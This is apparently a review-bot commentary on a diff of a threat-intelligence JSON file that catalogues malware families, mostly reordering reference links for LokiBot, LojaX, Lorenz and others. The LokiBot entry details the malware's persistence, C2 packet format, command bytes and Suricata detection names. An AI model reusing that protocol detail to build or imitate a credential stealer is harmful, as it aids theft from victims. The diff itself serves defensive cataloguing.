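Review bot: The `description` line is replaced only to rewrite the curly quotes around Trojan.Nymeria as `\u201c`/`\u201d`; after JSON parsing the value is byte-identical, so this is serializer churn (presumably an `ensure_ascii`-style setting changed) rather than an edit to the text. The removed Loki Bot description in the next hunk still carries literal `‘` and `“` characters, and its replacement is outside this view, so whether the whole file now uses one escaping convention cannot be told here; if it does not, anyone grepping or diffing the text will meet two spellings of the same characters. Pick one representation and apply it file-wide in the generator so that future diffs on description lines appear only when the wording changes.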
@@ -31629,18 +33140,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo",
- "https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html",
- "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/",
+ "https://twitter.com/jpcert_ac/status/1351355443730255872",
+ "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html",
 "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf",
 "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
- "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
- "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html",
- "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html",
- "https://twitter.com/jpcert_ac/status/1351355443730255872",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
 "https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html",
- "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/"
+ "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/",
+ "https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html",
+ "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html",
+ "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html"
 ],
 "synonyms": [],
 "type": []
@@ -31666,8 +33177,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos",
- "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md"
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md",
+ "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html"
 ],
 "synonyms": [],
 "type": []
@@ -31680,9 +33191,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu",
- "https://news.drweb.ru/show/?i=14177",
 "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf"
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://news.drweb.ru/show/?i=14177"
 ],
 "synonyms": [],
 "type": []
@@ -31695,12 +33206,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax",
- "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://habr.com/ru/amp/post/668154/",
 "https://www.youtube.com/watch?v=VeoXT0nEcFU",
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
 "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/"
+ "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -31713,9 +33224,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokilocker",
+ "https://www.msspalert.com/cybersecurity-research/lokilocker-ransomware-may-use-false-flag-to-avoid-identification/",
 "https://www.theregister.com/2022/03/16/blackberry_lokilocker_ransomware/",
 "https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware",
- "https://www.msspalert.com/cybersecurity-research/lokilocker-ransomware-may-use-false-flag-to-avoid-identification/"
+ "https://asec.ahnlab.com/en/52570/"
 ],
 "synonyms": [],
 "type": []
@@ -31724,65 +33236,66 @@
 "value": "LokiLocker"
 },
 {
- "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. 
If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
+ "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. 
For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. 
Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws",
- "https://github.com/R3MRUM/loki-parse",
- "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file",
- "https://lab52.io/blog/a-twisted-malware-infection-chain/",
- "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot",
- "http://reversing.fun/reversing/2021/06/08/lokibot.html",
- "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
- "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
- "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
- "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/",
- "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html",
- "https://www.youtube.com/watch?v=N0wAh26wShE",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
- "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/",
 "https://ivanvza.github.io/posts/lokibot_analysis",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
- "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/",
- "https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2",
- "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850",
- "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
- "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/",
 "https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "http://reversing.fun/posts/2021/06/08/lokibot.html",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/",
- "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
- "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
- "https://phishme.com/loki-bot-malware/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files",
 "http://www.malware-traffic-analysis.net/2017/06/12/index.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
- "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf",
+ "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
 "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations",
+ "https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/",
+ "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
 "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://www.youtube.com/watch?v=N0wAh26wShE",
+ "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
+ "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://lab52.io/blog/a-twisted-malware-infection-chain/",
+ "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "http://reversing.fun/posts/2021/06/08/lokibot.html",
+ "https://isc.sans.edu/diary/24372",
+ "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf",
+ "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
+ "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
+ "https://github.com/R3MRUM/loki-parse",
+ "http://reversing.fun/reversing/2021/06/08/lokibot.html",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/",
+ "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/",
+ "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/",
+ "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot",
 "https://isc.sans.edu/diary/27282",
- "https://isc.sans.edu/diary/24372"
+ "https://phishme.com/loki-bot-malware/",
+ "https://www.lastline.com/blog/password-stealing-malware-loki-bot/"
 ],
 "synonyms": [
 "Burkina",
@@ -31813,10 +33326,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062",
 "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
 "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062",
- "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
 "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63"
 ],
 "synonyms": [],
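Review bot: The new LokiBot refs list keeps near-duplicate entries that differ only by a trailing slash: the context line `https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations` and the added `https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/` both survive on the new side, and `http://reversing.fun/posts/2021/06/08/lokibot.html`, `http://reversing.fun/reversing/2021/06/08/lokibot.html` and `http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html` appear to be one article at three URLs. If this list is produced from an upstream export, normalising URLs (at least stripping the trailing slash) before emitting would stop the cluster from accumulating duplicate refs. The rewritten description line also carries two pre-existing slips that a touch of this line could fix: the example mutex closes with U+201C instead of U+201D (`\u201cB7E1C2CC98066B250DDB2123\u201c`) and the phrase `This value value is typically`. Separately, the logpos, logtu, lojax, lolsnif, longwatch, lookback, lordix, lorenz, lowball, lowkey, lsassDumper, lucifer, luminosity and lyposit hunks only permute refs, which suggests the export does not emit refs in a stable order; sorting them in the generator would keep future diffs reviewable.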
@@ -31830,8 +33343,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch",
- "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
 ],
 "synonyms": [],
 "type": []
@@ -31840,14 +33353,10 @@
 "value": "LONGWATCH"
 },
 {
- "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ",
+ "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term \u201cCipher\u201d) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper",
- "https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool",
- "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/",
- "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/",
- "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper"
 ],
 "synonyms": [],
 "type": []
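Review bot: The LooCipher entry loses four of its five references (the ZLab-Cybaze-Yoroi decryption tool, the Yoroi analysis, the marcoramilli decryptor post and the Fortinet recovery write-up) while the description is kept, so the only remaining source is the malpedia page and the free decryptor is no longer reachable from the galaxy entry. If this mirrors an upstream change it is presumably intended, but dropping refs is a different kind of edit from the re-orderings elsewhere in this commit and deserves a sentence in the commit message; otherwise the four removed lines should be restored.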
@@ -31860,16 +33369,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback",
- "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/",
- "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks",
 "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
- "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
 "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
 "https://nao-sec.org/2021/01/royal-road-redive.html",
- "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
+ "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks",
 "https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
+ "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
+ "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/"
 ],
 "synonyms": [],
 "type": []
@@ -31882,11 +33391,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix",
- "https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/",
+ "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py",
 "https://www.bromium.com/decrypting-l0rdix-rats-c2/",
- "https://blog.ensilo.com/l0rdix-attack-tool",
 "https://twitter.com/hexlax/status/1058356670835908610",
- "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py"
+ "https://blog.ensilo.com/l0rdix-attack-tool",
+ "https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/"
 ],
 "synonyms": [
 "lordix"
@@ -31902,13 +33411,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz",
 "https://arcticwolf.com/resources/blog/lorenz-ransomware-getting-dumped/",
- "https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/",
+ "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/",
 "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20",
- "https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/",
- "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/",
- "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware",
+ "https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/",
 "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
- "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/"
+ "https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/",
+ "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware",
+ "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/"
 ],
 "synonyms": [],
 "type": []
@@ -31935,8 +33444,8 @@
 "meta": {
 "refs": [
